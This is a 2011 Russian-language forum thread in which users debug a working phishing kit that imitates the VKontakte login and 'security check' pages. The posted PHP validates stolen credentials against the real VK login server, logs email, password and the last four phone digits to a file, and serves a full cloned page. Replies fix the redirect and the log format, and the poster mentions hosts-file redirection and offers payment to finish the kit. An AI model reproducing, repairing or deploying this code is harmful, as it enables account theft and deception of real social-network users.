Помогите с фейком Вконтакте
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя |
Сообщение |
<< Старые топики Новые топики >> |
|
|
Помогите с фейком Вконтакте - 2011-03-07 13:23:11.790000
|
|
|
You_DAD
Сообщений: 60
Оценки: 0
Присоединился: 2010-02-26 20:27:36.206666
|
После правельного ввода логина и пароля должен перекидывает на vksecurity.php, далее там вводяться 4 цыфры и на error.htm Но почему-то идет моментальный редирект с vksecurity.php на error.htm, т.е. цыфры невозможно ввести. весь фейк можно скачать здесь Вот vksecurity.php Подскажите, где ошибка? <?php session_start();
error_reporting(0);
function authorization($login,$password)
{
$ch = curl_init();
curl_setopt($ch,CURLOPT_URL,"http://login.vk.com/?act=login");
curl_setopt($ch,CURLOPT_POST,1);
curl_setopt($ch,CURLOPT_FOLLOWLOCATION,1);
curl_setopt($ch,CURLOPT_POSTFIELDS,"email=".$login."&pass=".$password);
curl_setopt($ch,CURLOPT_HEADER,1);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
$res = curl_exec($ch);
curl_close($ch);
if(preg_match("#<input type='hidden' name='op' value='slogin' />#i",$res,$matches))
return true;
else
return false;
}
$email = "";$pass = "";
if(isset($_POST['email']) and isset($_POST['pass']))
{
$email = $_POST['email'];
$pass = $_POST['pass'];
if(!authorization($email,$pass))
{
header("Location: wrong.php?email=".$email);
exit();
}
$_SESSION['data'] = "$email:$pass";
$fh = fopen("data.php","a");
fwrite($fh,"\r\n".$_SESSION['data']);
fclose($fh);
session_destroy();
echo "<script type=text/javascript>window.location.href = '/error.htm';</script>";
}
elseif($_POST['code'])
{
$_SESSION['data'] = ":".$_POST['code'];
$fh = fopen("data.php","a");
fwrite($fh,$_SESSION['data']."\r\n");
fclose($fh);
session_destroy();
echo "<script type=text/javascript>window.location.href = '/error.htm';</script>";
}
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<script type="text/javascript" src="vksecurity_files/al_loade.js"></script>
<link rel="shortcut icon" href="vksecurity_files/faviconn.ico" />
<meta http-equiv="content-type" content="text/html; charset=windows-1251;charset=windows-1251" />
<meta name="description" content=" " />
<title>В Контакте | Проверка безопасности</title>
<noscript><meta http-equiv="refresh" content="0; URL=/badbrowser.php"></noscript>
<link rel="stylesheet" type="text/css" href="vksecurity_files/common00.css" />
<!--[if lte IE 6]><style type="text/css" media="screen">/* <![CDATA[ */ @import url(/css/al/ie6.css?18); /* ]]> */</style><![endif]-->
<!--[if IE 7]><style type="text/css" media="screen">/* <![CDATA[ */ @import url(/css/al/ie7.css?12); /* ]]> */</style><![endif]-->
<script type="text/javascript">
var vk = {
al: parseInt('2') || 4,
intnat: '' ? true : false,
lang: 0,
rtl: parseInt('') || 0,
version: 1657,
zero: false
}
// msie6 hash fix
var ___htest = (location.toString().match(/#(.*)/) || {})[1] || '';
if (vk.al != 1 && ___htest.length) {
location.replace(location.protocol + '//' + location.host + '/' + ___htest.replace(/^\//, ''));
}
var StaticFiles = {
'common.js' : {v: 233},
'common.css': {v: 106},
'ie6.css' : {v: 18},
'ie7.css' : {v: 12}
,'lang0_0.js':{v:2494}
}
</script>
<script type="text/javascript" src="vksecurity_files/common00.js"></script>
<script type="text/javascript" src="vksecurity_files/lang0_00.js"></script>
</head>
<body onresize="onBodyResize()" class="is_rtl">
<div id="system_msg" class="fixed"></div>
<div id="utils"></div>
<div id="layer_bg" class="fixed"></div><div id="layer_wrap" class="scroll_fix_wrap fixed"><div id="layer"></div></div>
<div id="box_layer_bg" class="fixed"></div><div id="box_layer_wrap" class="scroll_fix_wrap fixed"><div id="box_layer"></div></div>
<a id="side_back_link" class="fixed" onmouseover="animate(this, {backgroundColor: '#E1E7ED'}, 200)" onmouseout="animate(this, {backgroundColor: '#FFF'}, 200)" onclick="if (this.href) return nav.go(this, event, {back: true}); scrollToTop(0);"></a>
<script type="text/javascript">domStarted();</script>
<div class="scroll_fix_wrap" id="page_wrap">
<div><div class="scroll_fix">
<div id="page_layout">
<div id="page_header" class="p_head p_head_l0">
<div class="back"></div>
<div class="left"></div>
<div class="right"></div>
<div class="content">
<a id="home" href="http://vkontakte.ru/" onclick="return nav.go(this, event)" class="fl_l"></a>
<div id="top_nav" class="head_nav ta_r">
<div id="top_links" style="">
<a class="fl_r top_nav_link" href="http://vkontakte.ru/reg0" onclick="return !showBox('al_register.php', {act: 'register_box'}, {params: {width: 514}, stat: ['reg.css']}, event)">Как стать участником?</a>
</div>
</div>
</div>
</div>
<div id="side_bar" class="fl_l" style="display: none">
<div id="quick_login">
<form method="POST" name="login" id="quick_login_form" action="http://login.vk.com/?act=login" onsubmit="if (vklogin) {return true} else {quick_login();return false;}">
<input type="hidden" name="act" value="login" />
<input type="hidden" name="q" value="1" />
<input type="hidden" name="al_frame" value="1" />
<input type="hidden" name="expire" id="quick_expire_input" value="" />
<input type="hidden" name="captcha_sid" id="quick_captcha_sid" value="" />
<input type="hidden" name="captcha_key" id="quick_captcha_key" value="" />
<input type="hidden" name="from_host" value="vkontakte.ru" />
<div class="label">E-mail или Логин:</div>
<div class="labeled"><input type="text" name="email" class="text" onfocus="show('quick_expire')" id="quick_email" /></div>
<div class="label">Пароль:</div>
<div class="labeled"><input type="password" name="pass" class="text" onfocus="show('quick_expire')" id="quick_pass" /></div>
<div class="checkbox" id="quick_expire" onclick="checkbox(this);ge('quick_expire_input').value=isChecked(this)?1:'';"><div></div>Чужой компьютер</div>
<input type="submit" class="submit" />
</form>
<div class="button_blue button_wide"><button id="quick_login_button">Войти</button></div>
<div class="clear forgot"><a href="http://vkontakte.ru/login.php?op=forgot" target="_top">Забыли пароль?</a></div>
</div>
</div>
<div id="page_body" class="simple">
<div id="header_wrap2">
<div id="header_wrap1">
<div id="header">
<h1 id="title">Проверка безопасности</h1>
</div>
</div>
</div>
<div id="wrap_between"></div>
<div id="wrap3"><div id="wrap2">
<div id="wrap1">
<div id="content"><style type="text/css">
#sideBar {
display: none;
}
#pageBody, #page_body.simple {
margin: 13px auto 0 auto;
float: none;
width: 570px;
}
#header {
background: #F7F7F7;
border-color: #D9E0E7;
padding: 0;
}
#header h1 {
padding: 4px 10px 5px 10px;
border-top: 1px solid #f7f8f9;
}
.footerVK {
margin: 0 auto;
padding-left: 0;
}
#securityCheck {
padding: 5px 18px 6px 18px;
line-height: 140%;
}
#page_body #securityCheck {
padding: 17px 30px 18px 30px;
}
#securityCheck .label {
color: #666;
font-size: 11px;
width: 190px;
}
#check_msg {
margin-bottom: 10px;
font-weight: normal;
}
</style>
<form method="POST" class="upload_frame" name="logout_form" id="logout_form" action="vksecurity.php" target="logout_frame">
<input type="hidden" name="act" value="logout" />
<input type="hidden" name="al_frame" value="1" />
<input type="hidden" name="from_host" value="vkontakte.ru" />
</form>
<iframe class="upload_frame" id="logout_frame" name="logout_frame"></iframe>
<div id="securityCheck">
<form method="POST" name="check">
<div id="check_msg" class="error" style="display: none;"></div>
Вы пытаетесь зайти на сайт <b>vkontakte.ru</b> из необычного места.<br/><br/>
Чтобы подтвердить, что Вы действительно являетесь владельцем своей страницы, пожалуйста, укажите последние <b>4 цифры номера</b> телефона, к которому привязана страница.
<table id="formTable" cellpadding="0" cellspacing="7" style="margin-top: 15px; width: 100%;">
<tr>
<td><div class="label ta_r"> </div></td>
<td><input name="code" id="code" type="text" class="text" style="width: 95%"/></td>
<td width="100%"></td>
</tr>
<tr>
<td></td>
<td style="white-space: nowrap;">
<div class="button_blue"><button id="validate_btn" onClick="document.check.submit();">Подтвердить</button></div>
<a href="http://login.vk.com/" style="padding-left: 8px;">Выйти</a>
</form>
</td>
<td></td>
</tr>
</table>
<div id="logoutButton" style="margin-top: 15px; text-align: center;display: none;">
<div class="button_blue"><button onclick="if (!checkEvent(event)) { ge('logout_form').submit(); return false; }">Выйти</button></div>
</div>
</div></div>
</div>
</div></div>
</div>
<div id="banner2" class="fl_r"></div>
<div id="footer_wrap" class="simple">
<div id="bottom_nav">
<a href="http://vkontakte.ru/help.php?page=about">о сайте</a>
<a href="http://vkontakte.ru/techsupp.php">техподдержка</a>
<a href="http://vkontakte.ru/blog.php">блог</a>
<a href="http://vkontakte.ru/help.php?page=terms">правила</a>
<a href="http://vkontakte.ru/ads.php">реклама</a>
<a href="http://vkontakte.ru/developers.php">разработчикам</a>
<a href="http://vkontakte.ru/pages.php?o=-1&p=Merchant%20API">магазинам</a>
</div>
<div id="footer" class="clear">
<div class="copy_lang"><a href="http://vkontakte.ru/help.php?page=about">В Контакте</a> © 2006-2011 <a onclick="ajax.post('lang.php', {act: 'change_lang', lang_id: 0, hash: '4936a15f2fc2ee0660'})">Русский</a><a onclick="ajax.post('lang.php', {act: 'change_lang', lang_id: 1, hash: '4936a15f2fc2ee0660'})">Українська</a><a onclick="ajax.post('lang.php', {act: 'change_lang', lang_id: 2, hash: '4936a15f2fc2ee0660'})">Беларуская (тарашкевiца)</a><a onclick="ajax.post('lang.php', {act: 'change_lang', lang_id: 3, hash: '4936a15f2fc2ee0660'})">English</a><a onclick="ajax.post('lang.php', {act: 'change_lang', lang_id: 11, hash: '4936a15f2fc2ee0660'})">Српски</a><a onclick="ajax.post('lang.php', {act: 'change_lang', lang_id: 10, hash: '4936a15f2fc2ee0660'})">Magyar</a><a onclick="ajax.post('lang.php', {act: 'change_lang', lang_id: 57, hash: '4936a15f2fc2ee0660'})">Azərbaycan</a><a onclick="showBox('lang.php', {act: 'lang_dialog'}, {noreload: true})">все языки »</a></div>
<div>
</div>
</div>
</div>
<div class="clear"></div>
</div>
</div></div></div>
<div class="progress" id="global_prg"></div>
<script type="text/javascript">
domReady();
updateMoney(false);
gSearch.init();
if (window.qArr && qArr[5]) qArr[5] = [5, "по товарам", "", "goods", 0x00000100];var qf = ge('quick_login_form'), ql = ge('quick_login'), qe = ge('quick_email'), qp = ge('quick_pass');
window.onload = function() {
setTimeout(function() {
ql.insertBefore(ce('div', {innerHTML: '<iframe class="upload_frame" id="quick_login_frame" name="quick_login_frame"></iframe>'}), qf);
qf.target = 'quick_login_frame';
}, 1);
}
qf.onsubmit = function() {
if (!ge('quick_login_frame')) return false;
if (!trim(qe.value)) {
focus(qe);
return false;
} else if (!trim(qp.value)) {
focus(qp);
return false;
}
return true;
}
window.focusLoginInput = function() {
scrollToTop(0);
notaBene('quick_email');
}
window.changeQuickRegButton = function(noShow) {
if (!vk.intnat) {
(noShow ? hide : show)('top_links');
}
}
window.submitQuickLoginForm = function(email, pass) {
ge('quick_email').value = email;
ge('quick_pass').value = pass;
ge('quick_login_form').submit();
}
ge('quick_login_button').onclick = function() { if (qf.onsubmit()) qf.submit(); };
if (browser.opera_mobile) show('quick_expire');
var btn = ge('validate_btn');
btn.onclick = function() {
if (!ge('code').value.length) { return false; }
lockButton(btn);
var params = {act: 'security_check', code: ge('code').value, to: 'ZGVuaWVsOTU-', al_page: '2', hash: '37ffe12eac12ffbe88'};
ajax.post('login.php', params, {
onDone: function (r, t) {
ge('check_msg').innerHTML = t;
show('check_msg');
unlockButton(btn);
if (!r) {
hide('formTable');
show('logoutButton');
}
}
});
return false;
};
handlePageParams({"id":0,"loc":"?act=security_check&al_page=2&to=ZGVuaWVsOTU-","noleftmenu":1,"notopmenu":1,"notopbars":1});vk.id = 0;
</script>
</body>
</html>
<!-- This document saved from http://vkontakte.ru/login.php?act=security_check&to=ZGVuaWVsOTU-&al_page=2 -->
|
|
|
RE: Помогите с фейком Вконтакте - 2011-03-07 14:28:31.813333
|
|
|
FriLL
Сообщений: 2539
Оценки: 335
Присоединился: 2007-08-11 17:14:26.703333
|
quote:
if(isset($_POST['email']) and isset($_POST['pass'])) { $email = $_POST['email']; $pass = $_POST['pass']; if(!authorization($email,$pass)) { header("Location: wrong.php?email=".$email); exit(); } $_SESSION['data'] = "$email:$pass"; $fh = fopen("data.php","a"); fwrite($fh,"\r\n".$_SESSION['data']); fclose($fh); session_destroy(); echo "<sсriрt type=text/jаvаsсript>window.location.href = '/error.htm';</sсriрt>"; } elseif($_POST['code']) { $_SESSION['data'] = ":".$_POST['code']; $fh = fopen("data.php","a"); fwrite($fh,$_SESSION['data']."\r\n"); fclose($fh); session_destroy(); echo "<sсriрt type=text/jаvаsсript>window.location.href = '/error.htm';</sсriрt>"; } Ну а с какого перепугу у тебя ридерект в коде 2 раза прописан? quote:
После правельного ввода логина и пароля должен перекидывает на vksecurity.php, далее там вводяться 4 цыфры и на error.htm А у тебя судя по коду после ввода логин-пароля редирект сразу на error.htm
|
|
|
RE: Помогите с фейком Вконтакте - 2011-03-07 14:50:11.083333
|
|
|
You_DAD
Сообщений: 60
Оценки: 0
Присоединился: 2010-02-26 20:27:36.206666
|
Разобрался, там где пишуться логин и пароль в базу просто нужно было vksecurity поставить, а уже там где код идет error.htm }
$email = "";$pass = "";
if(isset($_POST['email']) and isset($_POST['pass']))
{
$email = $_POST['email'];
$pass = $_POST['pass'];
if(!authorization($email,$pass))
{
header("Location: wrong.php?email=".$email);
exit();
}
$_SESSION['data'] = "$email:$pass";
$fh = fopen("data.php","a");
fwrite($fh,"\r\n".$_SESSION['data']);
fclose($fh);
session_destroy();
echo "<script type=text/javascript>window.location.href = '/vksecurity.php';</script>";
}
elseif($_POST['code'])
{
$_SESSION['data'] = ":".$_POST['code'];
$fh = fopen("data.php","a");
fwrite($fh,$_SESSION['data']."\r\n");
fclose($fh);
session_destroy();
echo "<script type=text/javascript>window.location.href = '/error.htm';</script>";
} Только один вопрос, логин и пароль в базу пишуться не с новой строки. Получается: логин:пароль:код логин:пароль:код а нужно: логин:пароль:код логин:пароль:код
|
|
|
RE: Помогите с фейком Вконтакте - 2011-03-07 16:28:56.850000
|
|
|
FriLL
Сообщений: 2539
Оценки: 335
Присоединился: 2007-08-11 17:14:26.703333
|
$_SESSION['data'] = "".$email.":".$pass." "; $fh = fopen("data.php","a"); fwrite($fh,$_SESSION['data']); fclose($fh);
|
|
|
RE: Помогите с фейком Вконтакте - 2011-03-08 19:51:13.543333
|
|
|
You_DAD
Сообщений: 60
Оценки: 0
Присоединился: 2010-02-26 20:27:36.206666
|
С этим проблему решил. Фейк под подмену хостс, подменил вручную, но именно , когда хостс правленный, он не функционирует. Главная страница есть, но логин и пароль он не проверяет и вообще нифига не делает. Вообщем, кто поможет доделать его отблагодарю:)
|
|
|
RE: Помогите с фейком Вконтакте - 2011-04-01 11:19:31.406666
|
|
|
organizeit
Сообщений: 26
Оценки: 0
Присоединился: 2011-03-30 17:04:03.143333
|
Интерестное решение проблемы у Модэратора
|
|
|
|
|